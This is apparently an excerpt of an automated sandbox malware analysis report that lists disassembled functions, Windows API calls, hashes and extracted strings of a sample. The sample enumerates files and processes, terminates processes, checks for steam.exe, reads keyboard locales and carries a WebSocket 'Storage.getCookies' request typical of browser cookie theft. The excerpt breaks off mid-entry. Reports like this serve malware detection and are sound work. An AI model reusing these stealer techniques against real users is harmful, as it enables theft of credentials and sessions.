                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                            • String ID: %s\%s$%s\*
                            • API String ID: 4184593125-2848263008
                            • Opcode ID: 6ff35e601f49d05d0533807d7c49b3b35456ea62e000f8612b8f93efd363f774
                            • Instruction ID: afe7120b50fb3989cb704b8ebcd0967e1798de8f3bb7dcb47c097cadd06c0dc8
                            • Opcode Fuzzy Hash: 6ff35e601f49d05d0533807d7c49b3b35456ea62e000f8612b8f93efd363f774
                            • Instruction Fuzzy Hash: C3617171900208ABCB21EFB4DC89AEE77B9FF48300F0445A9F54AD7251EB74AA45CF60
                            Function 00D7D530 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 183stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 00D7D54D
                            • FindFirstFileA.KERNEL32(?,?), ref: 00D7D564
                            • StrCmpCA.SHLWAPI(?,00D917A0), ref: 00D7D584
                            • StrCmpCA.SHLWAPI(?,00D917A4), ref: 00D7D59E
                            • lstrcat.KERNEL32(?,00BFE8D0), ref: 00D7D5E3
                            • lstrcat.KERNEL32(?,00BFE7D0), ref: 00D7D5F7
                            • lstrcat.KERNEL32(?,?), ref: 00D7D60B
                            • lstrcat.KERNEL32(?,?), ref: 00D7D61C
                            • lstrcat.KERNEL32(?,00D91794), ref: 00D7D62E
                            • lstrcat.KERNEL32(?,?), ref: 00D7D642
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7D682
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7D6D2
                            • FindNextFileA.KERNEL32(00000000,?), ref: 00D7D737
                            • FindClose.KERNEL32(00000000), ref: 00D7D746
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                            • String ID: %s\%s
                            • API String ID: 50252434-4073750446
                            • Opcode ID: 72a6ca5712f0f3b90ccb5a18521c081ec04ffe0875bfec617108e83af928c7b3
                            • Instruction ID: d8a4a167cd5eb7575d1e9055a9fd9ac5efdbf338134b2456151cc86d827478fa
                            • Opcode Fuzzy Hash: 72a6ca5712f0f3b90ccb5a18521c081ec04ffe0875bfec617108e83af928c7b3
                            • Instruction Fuzzy Hash: 2E61767191011D9BCF20EFB4DC88AEE77B9EF48300F048499E65993250EB74AA45CFB0
                            Function 00D848B0 Relevance: 16.1, APIs: 4, Strings: 6, Instructions: 1129COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_
                            • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                            • API String ID: 909987262-758292691
                            • Opcode ID: 0d64577a62102bc9ba266923c2ed8d474f3c45cd94b1e339965d39c632d62d05
                            • Instruction ID: 7fa1c3252d23d5cca475937f9e811d07ba819dcf2c44fd96bec88003f9690029
                            • Opcode Fuzzy Hash: 0d64577a62102bc9ba266923c2ed8d474f3c45cd94b1e339965d39c632d62d05
                            • Instruction Fuzzy Hash: 61A24771D012699FDB20EFA8C8907EDBBB6FF48300F1485AAD509A7241DB715E85DFA0
                            Function 00D723A9 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 106stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D723D4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D723F7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D72402
                            • lstrlen.KERNEL32(\*.*), ref: 00D7240D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7242A
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 00D72436
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7246A
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00D72486
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID: \*.*
                            • API String ID: 2567437900-1173974218
                            • Opcode ID: ad6d839fe7ca570e66c3c604ebe18a60aed161862df34f8c4487e7f498ed550d
                            • Instruction ID: 09a45edfd6722b59b34aec6a63e30a351cf9a8bf354d7f69edaf9bfadec9cfca
                            • Opcode Fuzzy Hash: ad6d839fe7ca570e66c3c604ebe18a60aed161862df34f8c4487e7f498ed550d
                            • Instruction Fuzzy Hash: 7E418330552A498BCB31EFA8DC85ABE73B4FF54304F085129F84A97211DBB0DD458BB0
                            Function 00D846A0 Relevance: 13.6, APIs: 9, Instructions: 54processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00D846B9
                            • Process32First.KERNEL32(00000000,00000128), ref: 00D846C9
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00D846DB
                            • StrCmpCA.SHLWAPI(?,?), ref: 00D846ED
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00D84702
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00D84711
                            • CloseHandle.KERNEL32(00000000), ref: 00D84718
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00D84726
                            • CloseHandle.KERNEL32(00000000), ref: 00D84731
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                            • String ID:
                            • API String ID: 3836391474-0
                            • Opcode ID: 3e6116fc63c46dffec24f9e82803daff4cb9fbbf7f646cdf6c87d014902fb16d
                            • Instruction ID: a75297278ea48faecde9f298a7678f298eb841c81d13f998cbb3d10580c652ab
                            • Opcode Fuzzy Hash: 3e6116fc63c46dffec24f9e82803daff4cb9fbbf7f646cdf6c87d014902fb16d
                            • Instruction Fuzzy Hash: 5D01D6315011196BE7206B74DC8DFFA377CEB4AB45F04008EF905D2090EFB499459BB0
                            Function 01121322 Relevance: 13.0, Strings: 9, Instructions: 1725COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 28^$;0Wy$Sq$mo$rFnh$r7_$tt;;$yM:_$u^}
                            • API String ID: 0-1887647372
                            • Opcode ID: 343f74f2fb426c36a91753a102461387563f073fe782f2fbace49c0c2e226606
                            • Instruction ID: d790fa0e06543a8d5db992f672d217b44f89a5cab2c2a23ab4b2ec24bb6d289c
                            • Opcode Fuzzy Hash: 343f74f2fb426c36a91753a102461387563f073fe782f2fbace49c0c2e226606
                            • Instruction Fuzzy Hash: 68B23BF3A0C214AFE3046E2DEC8567BB7D9EB94720F16453DE6C4C3744EA3598058697
                            Function 00D84610 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00D84628
                            • Process32First.KERNEL32(00000000,00000128), ref: 00D84638
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00D8464A
                            • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00D84660
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00D84672
                            • CloseHandle.KERNEL32(00000000), ref: 00D8467D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                            • String ID: steam.exe
                            • API String ID: 2284531361-2826358650
                            • Opcode ID: 1d9fc8d8f386aca50fcc13429af9ee91ba1594bdcf34fc9863e0d83c0f2149a2
                            • Instruction ID: e83e3d3bafbb72f8b28fe41a81e83068e42f67ffe622e5af2e7d794391e6501a
                            • Opcode Fuzzy Hash: 1d9fc8d8f386aca50fcc13429af9ee91ba1594bdcf34fc9863e0d83c0f2149a2
                            • Instruction Fuzzy Hash: 0F0167715051195BE720AB74AC4AFEA777CEF09750F0401DAED08D1050FFB499549BE5
                            Function 00D74B29 Relevance: 12.1, APIs: 8, Instructions: 102stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D74B51
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D74B74
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D74B7F
                            • lstrlen.KERNEL32(00D94CA8), ref: 00D74B8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D74BA7
                            • lstrcat.KERNEL32(00000000,00D94CA8), ref: 00D74BB3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D74BDE
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00D74BFA
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID:
                            • API String ID: 2567437900-0
                            • Opcode ID: 2663b1c393b88a30dd64c0240573c6259dbe2a517d8a4a388636b899f4251174
                            • Instruction ID: 90da946dc28b6e2f001b140f41dcaaae98bd93bc39836f66bbd0fcac30cc712f
                            • Opcode Fuzzy Hash: 2663b1c393b88a30dd64c0240573c6259dbe2a517d8a4a388636b899f4251174
                            • Instruction Fuzzy Hash: 4B3163315629199BCB22EF68EC85EAE77B9FF54300F095129F80997211DBB0DD018BB0
                            Function 00D82D60 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 235memoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D871E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00D871FE
                            • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00D82D9B
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00D82DAD
                            • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00D82DBA
                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00D82DEC
                            • LocalFree.KERNEL32(00000000), ref: 00D82FCA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                            • String ID: /
                            • API String ID: 3090951853-4001269591
                            • Opcode ID: cb679c9600293ff88ad26f4aa650ee091fcef5183e5e9925eddcfa2ace809e58
                            • Instruction ID: 525968201eb62838b2d22aeabba015324e907ed356147ac966c2d1670ea29e1d
                            • Opcode Fuzzy Hash: cb679c9600293ff88ad26f4aa650ee091fcef5183e5e9925eddcfa2ace809e58
                            • Instruction Fuzzy Hash: ADB1FB71904204CFD715DF19C948BA9B7F1FF44324F2AC1AAE4096B2A2D7769D82CFA4
                            Function 0112B283 Relevance: 10.4, Strings: 7, Instructions: 1690COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ?$,{$6Hy$N+n$\d~$epz;$pf_
                            • API String ID: 0-2905619878
                            • Opcode ID: 1ec64974d77e2758eb17665d1e23032acd0e1bec273bda7d85c5425959937157
                            • Instruction ID: 8d090ccf7fc150a4b335944c32455cf98d83adfa3b0d275fcb5e0f3b38c2013c
